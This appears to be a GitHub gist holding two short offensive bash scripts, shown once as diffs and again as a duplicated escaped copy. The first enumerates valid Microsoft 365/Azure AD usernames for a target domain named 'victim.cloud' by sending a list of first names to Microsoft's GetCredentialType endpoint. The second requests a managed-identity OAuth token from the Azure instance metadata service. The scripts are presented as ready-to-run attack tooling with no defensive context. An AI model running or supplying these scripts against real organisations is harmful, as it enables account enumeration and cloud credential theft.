thanandorn · July 9, 2020 13:18
diff --git a/enum_001.sh b/enum_001.sh
 #!/bin/bash

 cat << EOF >userlist.txt
 John
 William
 James
 Charles
 George
 Frank
 Joseph
 Thomas
 Henry
 Robert
 Edward
 Harry
 Walter
 Bob
 Arthur
 Fred
 Albert
 Samuel
 David
 Louis
 EOF

 function enum() {
  DOMAIN=${1:-domain.com}
  USERLIST=${2:-userlist.txt}
  DATA=`curl -s "https://login.microsoftonline.com/getuserrealm.srf?login=test@$DOMAIN"`
  LVL=`echo $DATA | jq -er '.NameSpaceType'`
  if [ "$LVL" == "Managed" ]
  then
    echo "================================================================"
    echo "Domain: $DOMAIN"
    echo "Status: $LVL"
    echo "Fedration Brand Name: `echo $DATA | jq -er '.FederationBrandName'`"
    echo "================================================================"
    echo "Status| Name"
    for i in `cat $USERLIST`;
    do  
      data=
      output=`curl -s -X POST https://login.microsoftonline.com/common/GetCredentialType -d ""{\"Username\":\"$i@$DOMAIN\"}"" | jq -e '.IfExistsResult'`
      if [ "$output" == "0" ]
      then
        echo  "True  | $i@$DOMAIN"
      else
        echo "False | $i@$DOMAIN"
      fi  
    done
  else
    echo "================================================================"
    echo "Domain: $DOMAIN"
    echo "Status: $LVL"
    echo "================================================================"
  fi  
 }

 enum victim.cloud
diff --git a/gistfile1.txt b/gistfile1.txt
 #!/bin/bash

 curl -s -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token
	#!/bin/bash

	cat << EOF >userlist.txt
	John
	William
	James
	Charles
	George
	Frank
	Joseph
	Thomas
	Henry
	Robert
	Edward
	Harry
	Walter
	Bob
	Arthur
	Fred
	Albert
	Samuel
	David
	Louis
	EOF

	function enum() {
	DOMAIN=${1:-domain.com}
	USERLIST=${2:-userlist.txt}
	DATA=`curl -s "https://login.microsoftonline.com/getuserrealm.srf?login=test@$DOMAIN"`
	LVL=`echo $DATA \| jq -er '.NameSpaceType'`
	if [ "$LVL" == "Managed" ]
	then
	echo "================================================================"
	echo "Domain: $DOMAIN"
	echo "Status: $LVL"
	echo "Fedration Brand Name: `echo $DATA \| jq -er '.FederationBrandName'`"
	echo "================================================================"
	echo "Status\| Name"
	for i in `cat $USERLIST`;
	do
	data=
	output=`curl -s -X POST https://login.microsoftonline.com/common/GetCredentialType -d ""{\"Username\":\"$i@$DOMAIN\"}"" \| jq -e '.IfExistsResult'`
	if [ "$output" == "0" ]
	then
	echo "True \| $i@$DOMAIN"
	else
	echo "False \| $i@$DOMAIN"
	fi
	done
	else
	echo "================================================================"
	echo "Domain: $DOMAIN"
	echo "Status: $LVL"
	echo "================================================================"
	fi
	}

	enum victim.cloud
	#!/bin/bash

	curl -s -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token